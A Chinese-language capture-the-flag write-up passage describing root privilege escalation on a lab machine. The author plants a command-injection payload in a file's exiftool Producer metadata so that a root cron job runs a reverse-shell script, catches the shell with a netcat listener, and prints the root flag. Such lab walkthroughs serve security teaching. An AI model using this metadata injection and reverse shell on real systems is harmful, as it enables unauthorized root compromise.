在/tmp文件夹下创建test文件,更改创建者为执行反弹shell脚本的语句exiftool -Producer='a[$(/var/www/api/vendor/dompdf/dompdf/lib/reverse_shell.sh>&2)]+42' test,使用nc开启6666端口的监听。

[email protected]:/tmp$ touch test[email protected]:/tmp$ exiftool -Producer='a[$(/var/www/api/vendor/dompdf/dompdf/lib/reverse_shell.sh>&2)]+42' test    1 image files updated

等待定时计划执行,在nc成功接收到root权限的shell,并获取到root.txt。

┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ nc -lnvp 6666listening on [any] 6666 ...connect to [10.10.14.2] from (UNKNOWN) [10.129.72.208] 45822bash: cannot set terminal process group (6164): Inappropriate ioctl for devicebash: no job control in this shell[email protected]:~# id   iduid=0(root) gid=0(root) groups=0(root)[email protected]:~# cat root.txtcat root.txt657c064e22ad2b8fe23348af755061e6

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NzYxMjI5OA==&mid=2247485695&idx=1&sn=bf6a9d3ede974e54b09abb8a6946913b&chksm=c06e679af719ee8c5425d4314044d15ae0797b39c312cbf65e45921af14e2b2305fcee5b6366#rd
如有侵权请联系:admin#unsafe.sh